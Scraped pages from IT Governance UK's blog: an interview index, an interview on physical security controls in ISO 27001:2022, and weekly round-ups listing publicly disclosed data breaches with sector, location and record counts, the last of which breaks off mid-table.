
Cyber incident responder Vanessa shares recent ransomware trends, why they’re worrying, and what organisations can do about them in this interview.

Leon Teale on secure remote working and VPNs

23 October 2023

Senior penetration tester Leon gives us his top 10 tips for secure remote working. He also talks us through different VPN (virtual private network) technologies in this interview.


Data privacy

Kirsten Craig on the APRA

17 May 2024

In the US, expectations are – cautiously – rising that we could see a landmark single federal privacy standard enacted into law: the APRA (American Privacy Rights Act). Data privacy lawyer Kirsten takes us through what it is, its requirements, its interplay with state-specific laws, its scope, and the next steps in this interview.

Ryan Peeney on records of processing activities

9 May 2024

Records of processing activities, also known as ‘ROPAs’, are an explicit legal requirement in Article 30 of both the UK and EU GDPR. But what exactly are they? Why are they important, and what are their benefits? And how can you create and maintain them? We put all these questions and more to DPO (data protection officer) consultant Ryan in this interview.

Louise Brooks on practical GDPR compliance

25 April 2024

Numerous misunderstandings surround complying with the GDPR. As a principles- and risk-based law, there aren’t prescribed dos and don’ts – the Regulation simply provides a framework for compliance. Furthermore, compliance can be a business enabler, not a ‘necessary evil’. Head of consultancy at DQM GRC Louise explains further in this interview.

Ola Irukwu on biometric data

11 April 2024

DPO consultant Ola talks us through biometric data – what is it, and how do the GDPR’s principles and requirements apply to it? She also explains the importance of DPIAs (data protection impact assessments) and data protection by design in this interview.

Mark James on data seeding

22 March 2024

Privacy consultant Mark explains what data seeding is, why it’s such an unintrusive measure, and when and how to use it in this interview.

Louise Brooks on staff monitoring

4 March 2024

How much and what type(s) of staff monitoring is too much? How can organisations monitor staff while remaining compliant with privacy laws? Head of consultancy at DQM GRC Louise gives us the answers in this interview.

Alan Calder on maintaining GDPR compliance

16 February 2024

Group CEO Alan takes us through what data privacy and GDPR compliance trends he foresees in 2024. He also gives us his 5 top tips for remaining compliant in this interview.

Andrew Snow on a landmark GDPR ruling

12 January 2024

The ECJ (European Court of Justice) issued a landmark GDPR ruling in December 2023. Data privacy and cyber security trainer Andrew takes us through the details, and explains why this ruling is so important in this interview.

Andrew Snow on the UK–US data bridge

6 November 2023

An adequacy decision covering UK–US data transfers came into force in October 2023. Data privacy and cyber security trainer Andrew talks us through the practical implications, how organisations can take advantage, and alternative mechanisms for UK–US data transfers in this interview.


DORA

Andrew Pattison on DORA, how it compares to NIS 2, and how it’ll be regulated

3 May 2024

What is DORA (Digital Operational Resilience Act)? How does it differ – or overlap – with NIS 2 (Network and Information Security Systems Directive)? What are the DORA pillars? How will DORA be regulated? And will non-EU organisations have to comply with it? We put these questions to Andrew, head of GRC (governance, risk and compliance) consultancy at IT Governance Europe, in this interview.

Andrew Pattison on simplifying DORA compliance with ISO 27001

26 January 2024

ISO 27001 can be used to simplify compliance with DORA. Head of GRC consultancy at IT Governance Europe Andrew explains how in this interview.

Cliff Martin on streamlining DORA compliance

18 December 2023

DORA’s requirements aren’t too dissimilar to those of other legislation and standards. Head of cyber incident response Cliff explains how to streamline DORA compliance in this interview.

Alan Calder on DORA supply chain security

11 December 2023

Group CEO Alan explains why supply chain security – a key DORA pillar – is so important, and how organisations can secure their supply chain in this interview.

Cliff Martin on DORA incident response

28 November 2023

Head of cyber incident response Cliff takes us through DORA’s incident response requirements – another pillar of the Regulation – in this interview.

Andrew Pattison on DORA risk management

13 November 2023

Head of GRC consultancy at IT Governance Europe Andrew explains the most important DORA pillar: ICT risk management. He talks us through the Regulation’s requirements and how organisations can meet them in this interview.


Europrivacy

Alice Turley on the Europrivacy scheme and certification

26 April 2024

What is Europrivacy™, who can apply for certification, and what are the benefits? How do the scheme and certification work? And what must applicants consider when choosing a consulting company? Senior privacy and GRC consultant and trainer Alice answers all these questions in this interview.


Incident response

Vanessa Horton on cyber incident response

24 May 2024

Cyber incident responder Vanessa gives us a complete, practical overview of cyber incident response. She talks us through common misconceptions and errors, threat types, protection, detection, cyber incident response plans, training, digital forensics and the incident response process. She also covers real-life examples in this interview.

Vanessa Horton on anti-forensics

2 February 2024

Criminals use anti-forensics techniques to try to remain undetected and/or mask their actions. Cyber incident responder Vanessa explains further, and provides examples of anti-forensics techniques as well as advice for how organisations can protect themselves, in this interview.


ISO 27001

Matthew Peers on ISO 27001 and physical security

15 May 2024

When we hear ‘information security’ or ‘ISO 27001’, we usually think ‘cyber security’. However, physical security is also an important aspect of information security. In fact, in ISO 27001:2022, ‘physical’ is one of just four control themes. GRC consultant Matthew explains why, and talks us through physical access control, physical security monitoring, CCTV, and more in this interview.

Alan Calder on transitioning to ISO 27001:2022

10 April 2024

Group CEO Alan explains why ISO 27001 and ISO 27002 were updated in 2022. He also talks us through key changes and transition dates, and how to approach your transition project in this interview.

Alan Calder on ISO 27001 and defence in depth

20 March 2024

Group CEO Alan explains how ISO 27001 and defence in depth intersect, and the importance of each. He also talks us through the ISO 27000 family of standards, and how ISO 27001 can help organisations meet their regulatory requirements in this interview.

Alan Calder on the ISO 27001:2022 addendum and ISO 27006 update

15 March 2024

ISO 27006 was recently updated. An ISO 27001:2022 addendum was also recently released. Group CEO Alan gives us the highlights of both updates, as well as an overview of the business benefits and regulatory value of ISO 27001, in this interview.

Andrew Pattison on pragmatic ISO 27001 risk assessments

8 March 2024

ISO 27001 fundamentally takes a risk-based approach. Head of GRC consultancy at IT Governance Europe Andrew gives us his tips on how to keep your risk assessments simple and manageable in this interview.

Alan Calder and a quick overview of ISO 27001

6 March 2024

Group CEO and ISO 27001 pioneer Alan gives us a quick overview of the business benefits of ISO 27001. He also talks us through how the Standard can aid regulatory compliance, and offers tips on risk assessment and continual improvement in this interview.


PCI DSS

Stephen Hancock on PCI DSS SAQ SPoC

30 October 2023

QSA (Qualified Security Assessor) consultant Stephen gives us an overview of the latest PCI DSS SAQ (Payment Card Industry Data Security Standard self-assessment questionnaire): SAQ SPoC (software-based PIN entry on COTS). He explains which organisations qualify and how SPoC solutions work in this interview.


PECR

Louise Brooks on cookie compliance

19 January 2024

Head of consultancy at DQM GRC Louise shares how organisations can improve their cookie banners without hampering their business objectives, and common mistakes around obtaining valid consent, in this interview.

Louise Brooks on the ICO’s ultimatum on cookies

4 December 2023

The ICO (Information Commissioner’s Office) gave the UK’s top websites an ultimatum: get your cookies compliant, or risk enforcement action. Head of consultancy at DQM GRC Louise gives her insights into this ICO statement and ICO enforcement more generally, and advice on how organisations can best meet their cookie requirements, in this interview.


Security testing

Leon Teale on the CVSS

9 February 2024

The CVSS (Common Vulnerability Scoring System) is now at v4.0. Senior penetration tester Leon explains what the CVSS is, how it works, when to use it, its limitations, and the key changes introduced in CVSS v4.0 in this interview.


Supply chains

Andrew Pattison on simplifying supply chain risk management

5 April 2024

Head of GRC consultancy at IT Governance Europe Andrew explains the importance of keeping risk assessments and supply chain risk management simple, and how DORA might change how organisations manage risk. He also talks us through considerations around risk when outsourcing, e.g. to a Cloud provider, in this interview.


Training

Soji Ogunjobi on CISM®

4 April 2024

Cyber security specialist and instructor Soji gives us a complete overview of CISM (Certified Information Security Manager), talking us through its topics, intended audience, career opportunities, alternatives, and more in this interview.

Damian Garcia on ransomware elearning

7 February 2024

Head of GRC consultancy at IT Governance Damian recently updated our Ransomware Staff Awareness E-learning Course. He explains why this course is so important, the key topics covered, its top take-aways, and more in this interview.


Miscellaneous

Nicola Day on book formats

22 March 2024

Softcover, PDF eBook or ePub? Publications manager Nicola explains the differences between them to help you choose the right book format for you in this interview.

Sophie Sayer on the IT Governance partner programme

14 February 2024

Head of channel Sophie talks us through the IT Governance partner programme, and the benefits of partnering with us, in this interview.

Andreas Chrysostomou on audiobooks

10 January 2024

Publishing relations manager Andreas explains the audiobook format – including its pros and cons, how audiobooks are developed, and more – in this interview.

Sam McNicholls-Novoa on CyberComply

20 December 2023

CyberComply is a Cloud-based, end-to-end solution that simplifies compliance with a range of cyber security and data privacy standards and laws. Product marketing manager Sam talks us through some of the software’s benefits and features in this interview.


Get the latest expert insights straight to your inbox

If you like our weekly interviews, you’ll love our free weekly newsletter, the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Interviews with our experts, sharing their insights and expertise;
  • Industry news, including the latest publicly disclosed data breaches and cyber attacks;
  • Our latest research and statistics;
  • Free useful resources; and
  • Upcoming webinars.

ISO 27001 and Physical Security
https://www.itgovernance.co.uk/blog/iso-27001-and-physical-security
Wed, 15 May 2024 10:41:07 +0000

Physical access control, physical security monitoring, CCTV, and more

When we hear the term ‘information security’ – or, for that matter, ‘ISO 27001’ – our thoughts usually turn straight to cyber security.

However, physical security is also an important aspect of information and data security. In fact, in the 2022 versions of ISO 27001 and ISO 27002, ‘physical’ is one of just four control themes.

As such, the Standards also list explicit physical security controls, which organisations must either implement or justify why they don’t need to in their SoA (Statement of Applicability) to certify against ISO 27001.

Matthew Peers, one of our GRC (governance, risk and compliance) consultants, helps organisations implement the Standard and prepare for ISO 27001 certification.

Before joining IT Governance, Matthew served in the British Army Intelligence Corps for 12 years, providing intelligence and security advice to personnel and their families in the UK and abroad. This included conducting physical security surveys of British Army bases in the south of England.

Just the man to talk to about ISO 27001 and physical security!


In this interview

  • Why ‘physical’ is a separate control theme
  • Physical (and logical) access controls and visitor policies
  • Why physical security monitoring needed a new Annex A control
  • The benefits and drawbacks of CCTV as a preventive and detective measure
  • Key considerations around building security – even if you’re a small organisation
  • How to remotely audit physical security
  • Remote-working tips

One of the big changes in the 2022 editions of ISO 27001 and ISO 27002 is the four themes, one of which is physical. Is this an acknowledgement that physical security can be overlooked?

I’d say that the separate category just filters out those controls better.

Since COVID, many organisations operate remotely. So, for the purposes of control selection, many physical security controls can be justifiably excluded if all staff work from home.

Having a separate category for those controls makes this more practical to do.

For the organisations that still have a physical location, what physical security measures must they consider?

They should look at their overall physical security system[s]. That said, one big thing clients often talk me through is their visitor policy: how do they process visitors? How do they make sure visitors only go to the designated areas? And so on.

This fits into a wider conversation around physical access control. Just because someone is an employee doesn’t mean they should be allowed to go everywhere.

For example, if you have a room that stores sensitive information or equipment, only those who have a need to see or use it should be able to access that room.

Similar principles apply to logical access: organisations must restrict this on a need-to-know basis and by the principle of least privilege [PoLP].

What access controls should organisations implement?

Common logical [cyber/digital] access controls include passwords and MFA [multifactor authentication], firewalls, and network segmentation and segregation. Ideally, you’d apply these in a zero-trust architecture.

For physical security, you can use:

  • The simple but effective key and lock;
  • A combination lock or PIN pad; or
  • Card readers.

You could also use biometric access control, but using biometric data is subject to stricter legal requirements around privacy [under the UK GDPR – General Data Protection Regulation].

What about physical security monitoring?

That’s the only new control introduced in the 2022 Standards for the ‘physical’ theme. Control 7.4: “Premises should be continuously monitored for unauthorized physical access.”

This could be something like CCTV, or a human element – a security guard, whether physically near the door or at the other end of a switchboard.

Alarms are good, too, but they raise questions like who’s going to come in to investigate when one goes off at, say, 4:00 am on a Saturday.

Why was a new, separate control for physical security monitoring needed?

It gives you enhanced peace of mind.

Suppose you own a lot of sensitive equipment and are in an area with a high crime rate [an aspect of environmental security]. You’d want that peace of mind that you’ll become aware of anyone interfering with your equipment.

In this respect, CCTV and other security monitoring act as both preventive measures – i.e. a deterrent – and detective measures. They’ll help detect suspicious activity, but also deter burglars. CCTV won’t stop everyone, but it’ll make at least a few people think twice, knowing their actions will be caught on camera.

In fact, CCTV can work well as a forensic measure, too. If someone does break in, CCTV can help identify the culprit. At the very least, it can inform the police where to dust for fingerprints, as the cameras show which surfaces the burglar has touched.

What are the risks or drawbacks around CCTV?

Cameras aren’t infallible – they can be covered up or out of order, for example.

Then there’s the footage itself – recordings might be overwritten, and you’re only going to keep them for a certain period anyway, if only for the sake of cost.

In addition, you need to be aware of your privacy obligations. Ensure that people know they’re being recorded – e.g. via a clearly visible CCTV notice – and why you’re collecting that data.

[This guide to the GDPR and CCTV in the workplace discusses this in more detail.]

So, control 7.4 in ISO 27001 isn’t accounting for a new phenomenon, but filling in a gap in the old Standard?

Yes, it just brings ISO 27001 up to date. Plus, ISO 27002 provides guidance beyond just installing video monitoring systems and intruder alarms – it also raises points like preventing them from being disabled remotely.

By formalising this as a control, organisations can get clearer guidance on its various aspects. They’ll also be less prone to overlooking things.

[Note: ISO 27002 provides generic guidance on how to implement each control in Annex A of ISO 27001.]

The ‘physical’ theme in ISO 27001:2022 and ISO 27002:2022 contains relatively few controls. Which are the most important?

The controls around building access:

  • How will you control access to your physical premises?
  • How will you identify who is and isn’t permitted to enter?
  • How will you keep unauthorised staff and other people out of restricted areas?

It’s about not overlooking anything. You may, for example, have your HR team in one part of the building to keep sensitive personal information about staff separate from, say, the sales team.

For similar reasons, you’d want to separate finance, too – very few people need access to financial information, so make sure you restrict it on a need-to-know basis.

What you don’t want to do is mix teams. When all finance staff sit together, it doesn’t matter whether one person looks at another’s screen and sees confidential financial data. But you can’t police casual glances from, say, a sales employee sitting next to finance staff.

Again, even vetted staff shouldn’t be seeing information not relevant to their job – particularly where that information is sensitive.

What if you’re a small organisation, with very few staff?

Even when you have different functions sitting in the same small room, you can designate a quiet space for sensitive work.

Or you can position screens in such a way that you can’t see what the person is working on if, for example, you walked into the managing director’s office. If you’re then invited to look at their screen, the director can make sure you can only see what you need to.

What, if any, aspect of physical security do you believe is overlooked?

Actually, organisations do quite a good job at this. Many are very switched on and alert about the physical side – the cyber side is where more problems emerge. That may be due to a lack of experience – we had to think about physical security long before the Internet emerged.

Situations like having multiple organisations within the same tall building are so common. It’s very normal to have, say, a tenth-floor office, with staff given a key card that only gives them access to that floor and the front door of the building.

Or if you have a visitor, they’d call at the front-desk reception, who then sends them to the correct floor and lets you know to buzz them in, or whatever.

Can you remotely audit physical security?

With cameras! An auditee will use something like a camera phone or laptop, then walk and talk the auditor through the process.

So, they’d say something like: ‘I’m standing outside the building. I’m now going to get my key card out and swipe into the building. If I was a guest, I’d call into reception here. I’d press that button, then tell the receptionist who I am and who I’ve come to see.

‘The receptionist then gives me a visitor lanyard, and phones the office. Someone from the office then comes down to show me upstairs.’

Admittedly, you get a better feel for the physical security when you’re there. Not least because you’re the visitor in that scenario.

But the remote camera makes for a good substitute in, say, a lockdown situation. Or when the organisation spans multiple premises. This is a particularly good option for internal audits, rather than certification audits, where the auditor would need a higher level of assurance.

Speaking of remote, even when all staff are home-based, work still involves a physical element, such as their home offices. What can organisations do to address those risks?

A remote working policy is a good place to start. This should cover things like physically securing company equipment. For example:

  • Avoid working in public
  • Only use secured Wi-Fi networks
  • Never leave your equipment unattended in public
  • When travelling by car, put the equipment in the car boot
  • When travelling by plane, put laptops, etc. in your carry-on luggage

Also, don’t let unauthorised people use the device!

Last November, a Scottish minister let his children use his tablet, running up a massive bill. He’d initially charged the taxpayer for that, but that aside, unauthorised users – family included – mustn’t gain access to company equipment under any circumstances.

What are some other remote-working tips?

Remote working typically involves putting stuff in the Cloud – old-school server and communications rooms are dying off.

Involving a Cloud service provider means you’re sharing the risk. Your data might be managed and secured by the provider, but you remain responsible for that data, legally speaking.

So, ask questions like:

  • What assurances can the provider give around security?
  • How will I make sure I can retrieve the data in the Cloud at any time?
  • What third-party suppliers does your provider use, where are they based, and how do you know you can trust them?

Under ISO 27001:2022, supply chain management stretches across multiple controls:

  • 5.19: Information security in supplier relationships
  • 5.20: Addressing information security within supplier agreements
  • 5.21: Managing information security in the ICT supply chain
  • 5.22: Monitoring, review and change management of supplier services
  • 5.23: Information security for use of Cloud services [another new control]

That signals its importance to overall information security. If your supply chain isn’t secure, nor are you.

Note: To learn more about how to simplify supply chain risk management, check out this interview with Andrew Pattison, head of GRC consultancy at IT Governance Europe.


Looking to improve staff awareness around physical security?

Our 45-minute Physical Security Staff Awareness E-learning Course may be just the thing.

This engaging course teaches staff what physical security is, and how they can contribute to keeping their workplace and your assets secure. It also addresses the threats posed by remote working.

More interested in general information security awareness training for staff? Check out our Information Security Staff Awareness Elearning Suite.


We hope you enjoyed this edition of our ‘Expert Insight’ series. We’ll be back soon, chatting to another expert with GRC International Group.

In the meantime, why not check out our interview with Group CEO Alan Calder about transitioning to ISO 27001:2022?

Alternatively, explore our full index of interviews here.

6,009,014 MovieBoxPro Accounts Breached in Another Data Scraping Incident
https://www.itgovernance.co.uk/blog/6009014-movieboxpro-accounts-breached-in-another-data-scraping-incident
Tue, 07 May 2024 13:35:19 +0000

Plus, a further 3,029,461 known records newly breached

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Publicly disclosed data breaches and cyber attacks: in the spotlight

More than 6 million accounts compromised from streaming service MovieBoxPro

MovieBoxPro, a streaming service of “questionable legality”, suffered a data scraping incident on 15 April 2024, according to Have I Been Pwned.

Data scraping is a typically automated process that extracts information from websites, allowing criminals to compile data sets containing personal information.

The data breached included usernames and email addresses.

Reportedly, the vulnerability has now been mitigated.

Data breached: 6,009,014 accounts.

A further 381,000 New York City public school students affected by 2022 data breach

In January 2022, personal data from around 820,000 New York City public school students, both current and former, was breached.

It emerged this week, according to the New York City Department of Education, that data from a further 381,000 students was also compromised in this incident.

Data breached: 1,201,000 people’s data.

At least 191 Australian organisations affected by ZircoDATA ransomware attack

The ransomware group BlackBasta listed Australia-based ZircoDATA as a victim in February, allegedly exfiltrating 395 GB of data.

This week, it turns out at least 191 further Australian organisations, including government entities, were affected by this breach, highlighting the risks of supply chain attacks. Apparently, the data belongs to tens of thousands of Australians.

Data breached: 395 GB.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 9,038,475 records known to be compromised, and 258 organisations suffering a newly disclosed incident. 253 of them are known to have had data exfiltrated, exposed or otherwise breached. For none of the others has it been confirmed that no data was breached.

We also found 11 organisations providing a significant update on a previously disclosed incident.

| Organisation(s) | Source(s) | Status | Sector | Location | Data breached? | Known data breached |
|---|---|---|---|---|---|---|
| MovieBoxPro | Source 1; source 2 | New | Leisure | China? | Yes | 6,009,014 |
| New York City public school | Source 1; source 2 | Update | Education | USA | Yes | 1,201,000 |
| ClubsNSW (via Outabox) | Source | New | Hospitality | Australia | Yes | 1,050,169 |
| Firstmac | Source | New | Finance | Australia | Yes | >500 GB |
| ZircoDATA and 191 Australian organisations | Source 1; source 2 | Update on ZircoDATA; other affected organisations new | IT services and unknown (but includes public) | Australia | Yes | 395 GB |
| Continuum Health Alliance, LLC | Source 1; source 2 | Update | Healthcare | USA | Yes | 377,119 |
| MedStar Health | Source | New | Healthcare | USA | Yes | 183,079 |
| OrthoConnecticut | Source | New | Healthcare | USA | Yes | 118,141 |
| Companies Registry | Source | New | Public | Hong Kong | Yes | 110,000 |
| Bluebonnet Trails Community Services | Source | New | Healthcare | USA | Yes | 76,165 |
| Enstar (US) Inc. | Source 1; source 2 | Update | Insurance | USA | Yes | 75,101 |
| Airsoftc3.com | Source | New | Software | USA | Yes | 75,000 |
| Hôpital de Cannes – Simone Veil | Source 1; source 2 | Update | Healthcare | France | Yes | 61 GB |
| Associated Wholesale Grocers | Source | New | Retail | USA | Yes | 26,579 |
| The Philadelphia Inquirer | Source 1; source 2 | Update | Media | USA | Yes | 25,549 |
| Bay Oral Surgery & Implant Center | Source | New | Healthcare | USA | Yes | 13,055 |
| Bousquet Holstein PLLC | Source | New | Legal | USA | Yes | 12,690 |
| Lamont, Hanley & Associates, Inc. | Source | New | Finance | USA | Yes | 11,484 |
| Inteplast Group | Source | New | Manufacturing | USA | Yes | 7,717 |
| Dental Health Services | Source | New | Insurance | USA | Yes | 6,340 |
| Los Angeles County Department of Health Services | Source | New | Public | USA | Yes | 6,085 |
| Bundeswehr | Source | New | Defence | Germany | Yes | >6,000 |
| Empath Health | Source | New | Healthcare | USA | Yes | 5,545 |
| Liberty University | Source | New | Education | USA | Yes | 5,434 |
| States of Guernsey | Source | New | Public | UK | Yes | >5,000 |
| West Idaho Orthopedics | Source 1; source 2 | Update | Healthcare | USA | Yes | 5,000 |
| Health First Urgent Care | Source | New | Healthcare | USA | Yes | 4,538 |
| Dohman Akerlund & Eddy | Source | New | Finance | USA | Yes | 3,687 |
| Illinois State Credit Union | Source | New | Finance | USA | Yes | 3,084 |
| Mana Products | Source | New | Manufacturing | USA | Yes | 2,470 |
| Bluegrass Care Navigators | Source | New | Healthcare | USA | Yes | 2,282 |
| Directive Communication Systems | Source | New | Finance | USA | Yes | 1,546 |
| VeriSource Services, Inc. | Source | New | IT services | USA | Yes | 1,382 |
Worthen Industries
Source 1; source 2
(Update)
ManufacturingUSAYes1,277
R.J. Grondin & Sons
Source
(New)
ConstructionUSAYes741
Mt Hira College
Source
(New)
EducationAustraliaYes>700
WELBRO Building Corporation
Source 1; source 2
(Update)
ConstructionUSAYes693
American Renal Management LLC
Source
(New)
HealthcareUSAYes501
Rebound Orthopedics & Neurosurgery
Source 1; source 2
(Update)
HealthcareUSAYes500
Chambers Construction Co.
Source
(New)
ConstructionUSAYes489
ClearVision Optical
Source
(New)
RetailUSAYes261
Symphony Financial, LLC.
Source
(New)
FinanceUSAYes151
City of Pensacola Government
Source 1; source 2
(Update)
PublicUSAYes22
Edenred
Source
(New)
FinanceBelgiumYes10
Victorian Ambulance Union Incorporated
Source
(New)
Non-profitAustraliaYesUnknown
Qantas
Source
(New)
TransportAustraliaYesUnknown
BC Libraries Cooperative
Source
(New)
IT servicesCanadaYesUnknown
The Post Millennial
Source
(New)
MediaCanadaYesUnknown
Cariboo Regional District Library Network
Source
(New)
PublicCanadaYesUnknown
Digicel Group
Source
(New)
TelecomsEl SalvadorYesUnknown
Magnet+
Source
(New)
TelecomsIrelandYesUnknown
Mellitah Oil and Gas B.V
Source
(New)
EnergyItalyYesUnknown
Bitvavo
Source
(New)
CryptoNetherlandsYesUnknown
Shook Lin & Bok Singapore
Source
(New)
LegalSingaporeYesUnknown
University of Alicante
Source
(New)
EducationSpainYesUnknown
io.net
Source
(New)
BlockchainUSAYesUnknown
Virginia Union University
Source
(New)
EducationUSAYesUnknown
George F. Young, Inc.
Source
(New)
EngineeringUSAYesUnknown
OE Federal Credit Union
Source
(New)
FinanceUSAYesUnknown
Harlowe
Source
(New)
HealthcareUSAYesUnknown
Northern California Behavioral Health System
Source
(New)
HealthcareUSAYesUnknown
Primary Care Health Partners
Source
(New)
HealthcareUSAYesUnknown
Panda Restaurant Group
Source
(New)
HospitalityUSAYesUnknown
CAI Technologies
Source
(New)
IT servicesUSAYesUnknown
SUN SSC
Source
(New)
IT servicesUSAYesUnknown
Formosa Plastics Corporation, U.S.A.
Source
(New)
ManufacturingUSAYesUnknown
Human Events.
Source
(New)
MediaUSAYesUnknown
GDI Services, Inc.
Source
(New)
Professional servicesUSAYesUnknown
Sterling Plumbing Inc.
Source
(New)
Professional servicesUSAYesUnknown
City of Wichita Kansas
Source
(New)
PublicUSAYesUnknown
Dropbox
Source
(New)
SoftwareUSAYesUnknown
Pike Finance
Source
(New)
BlockchainUnknownYesUnknown
La Nacion
Source
(New)
MediaArgentinaUnknownUnknown
London Drugs
Source
(New)
RetailCanadaUnknownUnknown
Superintendencia del Subsidio Familiar
Source
(New)
PublicColombiaUnknownUnknown
Diario El Salvador
Source
(New)
PublicEl SalvadorUnknownUnknown
Hong Kong Arts Development Council
Source
(New)
PublicHong KongUnknownUnknown

Note 1: ‘New’/‘Update’ against each organisation refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all. To learn more about our research methodology, click here.


AI

noyb files complaint against OpenAI for not correcting inaccurate information

The non-profit noyb filed a complaint against OpenAI with the Austrian data watchdog for failing to meet a key GDPR requirement: that personal data is accurate, and that data subjects have full access to that data along with source information.

noyb says: “OpenAI openly admits that it is unable to correct incorrect information on ChatGPT. Furthermore, the company cannot say where the data comes from or what data ChatGPT stores about individual people. The company is well aware of this problem, but doesn’t seem to care.”

Also this week, a group of US newspapers sued OpenAI and Microsoft for misusing their reporters’ writing to train their AI systems.

ICO publishes its response to regulating AI consultation

With the ICO (Information Commissioner’s Office) consultation on “Regulating AI: the ICO’s strategic approach – a response to the DSIT Secretary of State” now closed, the UK regulator has published its response.

New publications by DHS and NIST to help ensure safety and security of AI systems, as instructed by EO 14110

The US Department of Homeland Security has developed safety and security guidelines for critical infrastructure operators, as tasked by Executive Order 14110: “Safe, Secure, and Trustworthy Development and Use of Artificial Intelligence”.

Also this week, NIST released four draft publications “intended to help improve the safety, security and trustworthiness of [AI] systems”.


Enforcement

New UK laws for IoT device security

The UK government has published new laws, mandating Internet-connected smart devices to meet a minimum security standard. Most notably, it’s banning bad default passwords on IoT (Internet of Things) devices, becoming the first country to do so.

Group CEO Alan Calder commented:

It’ll certainly improve the long-term robustness of the UK’s cyber security infrastructure – but that’ll only be gradual, because it only applies to new devices.

The laws don’t apply retrospectively to the millions of inadequately protected smart devices already in service – and which are replaced over decades rather than months.

So, there won’t be any immediate benefit in terms of reduction in data breaches – progress on that front will continue to depend on better-educated consumers!

FCC fines four wireless carriers $196 million

The US Federal Communications Commission has fined four large US wireless carriers – AT&T, Sprint, T-Mobile and Verizon – $196 million for illegally sharing access to customers’ location data.

Unrelated, AT&T also recently suffered a large data breach, affecting more than 51 million customers’ data.

Three new GDPR fines

The ICO issued a £7,500 fine under the UK GDPR to Central Young Men’s Christian Association for failing to use Bcc, thereby revealing HIV status.

Under the EU GDPR, the Czech supervisory authority issued a €13.9 million fine for violating Articles 6 and 13. Meanwhile, the Greek authority issued the Hellenic Post a fine of 1% of the most recent global annual turnover for violating Articles 5(1)(f) and 32.


Other news

Security research team finds nearly 3 million Docker Hub repositories host malicious content

JFrog and Docker partnered for security research, finding that nearly 3 million Docker Hub repositories – almost 20% of all public repositories – host malicious content.

ICO and Ofcom publish statement on collaboration on regulating online services

Two UK regulators, the ICO and Ofcom (the UK’s communications regulator) have published a joint statement on “the regulation of online services where online safety and data protection intersect” to ensure “a coherent approach to regulation”.


New guidance

New NCSC guidance: AMS (Advanced Mobile Solutions)

The UK NCSC (National Cyber Security Centre) has published new guidance, called ‘AMS’ or ‘Advanced Mobile Solutions’. This risk model, along with “a set of architecture patterns and associated technologies” allows “high-threat organisations to stay connected ‘on the go’.”


Recently published reports


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next week with the biggest and most interesting news stories, all rounded up in one place.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The post 6,009,014 MovieBoxPro Accounts Breached in Another Data Scraping Incident appeared first on IT Governance UK Blog.

The Week in Cyber Security and Data Privacy: 15 – 21 April 2024 (https://www.itgovernance.co.uk/blog/the-week-in-cyber-security-and-data-privacy-15-21-april-2024; Mon, 22 Apr 2024 16:25:34 +0000)
16,482,365 known records breached in 241 newly disclosed incidents

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Publicly disclosed data breaches and cyber attacks: in the spotlight

Criminal hackers threaten to leak World-Check screening database

A criminal group known as GhostR claims to have stolen 5.3 million records from World-Check, a database used to screen potential customers for links to illegal activity and government sanctions.

Compromised data includes names, passport numbers, Social Security numbers, online crypto account identifiers and bank account numbers.

A spokesman for the London Stock Exchange Group, which maintains the database, confirmed the data was illegally obtained from a third party and didn’t dispute the amount of data stolen. GhostR says it obtained the records from a Singapore-based company with access to the database.

Data breached: 5,300,000 records.

Almost 1.5 million accounts compromised in Le Slip Français data breach

The French underwear manufacturer Le Slip Français has suffered a data breach. The alleged perpetrator, who goes by the name ShopifyGUY, claims to have obtained more than 1.5 million emails, including 690,000 sets of customer details comprising email addresses, names, postal addresses, phone numbers and purchase data.

ShopifyGUY is the same person who posted the Giant Tiger data last week. According to Troy Hunt of the data breach notification service HIBP (Have I Been Pwned), “it looks like they’re finding @Shopify keys somewhere then just dumping all the data. I’m told the JSON format these breaches all appear in is consistent with that, so it stands to reason that’s the common vector for all these breaches”.

Hunt has added 1,495,127 Le Slip Français accounts to the HIBP database.

Data breached: 1,495,127 accounts.

Mobile Guardian app hacked, compromising Singaporean parent and teacher data

The names and email addresses of parents and teachers from 5 primary and 122 secondary schools in Singapore have been compromised after a mobile app was hacked. Mobile Guardian, which is used to help parents manage their children’s device usage, was hacked on 19 April, according to the Singaporean Ministry of Education.

Mobile Guardian, which is based in the UK, said that its investigations detected unauthorised access to its systems via an administrative account on its management portal. Account records from the US were also accessed.

Data breached: unknown.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 16,482,365 records known to be compromised, and 241 organisations suffering a newly disclosed incident. 227 of them are known to have had data exfiltrated, exposed or otherwise breached. Only 6 definitely haven’t had data breached.

We also found 8 organisations providing a significant update on a previously disclosed incident.

Organisation(s) | Source(s) | New/Update | Sector | Location | Data breached? | Known data breached
World-Check, and a Singapore-based firm with access to it | Source | New | Finance and unknown | UK and Singapore | Yes | 5,300,000
Digi Yatra | Source | New | Software | India | Yes | >3,300,000
Le Slip Français | Source 1; source 2; source 3 | Update | Retail | France | Yes | 1,495,127
XD Connects | Source | New | Retail | Netherlands | Yes | 1 TB
DISB (District of Columbia Department of Insurance, Securities and Banking) and Tyler Technologies | Source 1; source 2; source 3; source 4 | Update | Public and software | USA | Yes | 800 GB
Smoke Alarm Solutions | Source | New | Professional services | Australia | Yes | 762,856
City of St. Cloud, FL | Source | Update | Public | USA | Yes | 719,597
Regulator Marine Inc | Source | New | Manufacturing | USA | Yes | 630 GB
